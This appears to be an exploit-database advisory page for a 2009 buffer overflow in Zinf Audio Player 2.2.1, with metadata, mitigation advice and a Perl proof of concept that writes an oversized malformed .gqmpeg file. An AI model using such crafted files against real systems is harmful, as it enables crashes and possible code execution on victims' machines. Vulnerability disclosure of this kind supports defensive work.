header-logo
Suggest Exploit
vendor:
Zinf Audio Player
by:
Hakxer
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Zinf Audio Player
Affected Version From: 2.2.2001
Affected Version To: 2.2.2001
Patch Exists: Yes
Related CWE: N/A
CPE: a:zinf:zinf_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC

A buffer overflow vulnerability exists in Zinf Audio Player 2.2.1 when handling a specially crafted gqmpeg file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Zinf Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC
# Greetz to : Egyptianxhacker,ProViDoR , Br1ght D@rk , Error Code , Kof2002 , Sql_Inj3ct0r , egy coders team , Sec-geeks.com


my $deamoddd="http://"."A" x 70000;

open(MYFILE,'>>hakxer.gqmpeg');

print MYFILE $deamoddd;

close(MYFILE);

print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team";

# milw0rm.com [2009-01-27]

Navigation

Suggest Exploit

Services By CQR